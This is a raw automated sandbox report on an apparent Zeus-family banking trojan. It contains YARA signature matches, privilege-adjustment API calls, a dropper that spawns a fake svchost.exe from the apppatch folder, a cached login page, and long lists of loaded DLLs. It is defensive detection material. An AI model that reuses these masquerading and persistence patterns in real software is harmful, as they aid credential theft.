Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7132, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 896, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 7144, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 5684, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6424, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 6204, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 824, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: Process Memory Space: nFjEHtbDTFjy.exe PID: 4612, type: MEMORYSTRMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: OjKmJJm2YT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engineClassification label: mal100.bank.troj.spyw.expl.evad.winEXE@7/34@2017/24
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,0_2_00401E00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00401E00 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00401E00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD5930 GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,2_2_02BD5930
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006B5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_006B5930
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014F5930 #680,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,6_2_014F5930
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00401CF0 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,0_2_00401CF0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00402680 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,0_2_00402680
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Program Files (x86)\Windows Defender\vonypom.comJump to behavior
Source: C:\Windows\apppatch\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\login[1].htmJump to behavior
Source: C:\Windows\apppatch\svchost.exeMutant created: NULL
Source: C:\Windows\apppatch\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\69889106a
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3816
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6928
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5368
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4976
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile created: C:\Users\user\AppData\Local\Temp\BB59.tmpJump to behavior
Source: OjKmJJm2YT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: OjKmJJm2YT.exeString found in binary or memory: -help
Source: svchost.exeString found in binary or memory: -help
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile read: C:\Users\user\Desktop\OjKmJJm2YT.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\OjKmJJm2YT.exe "C:\Users\user\Desktop\OjKmJJm2YT.exe"
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6928 -s 756
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 772
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 736
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 800
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeProcess created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"Jump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: opengl32.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: glu32.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: opengl32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: glu32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: vmhgfs.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpolicyiomgr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winscard.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\apppatch\svchost.exeSection loaded: winsta.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: wldp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: profapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: winscard.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: sensapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: samcli.dllJump to behavior
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeSection loaded: netutils.dllJump to behavior
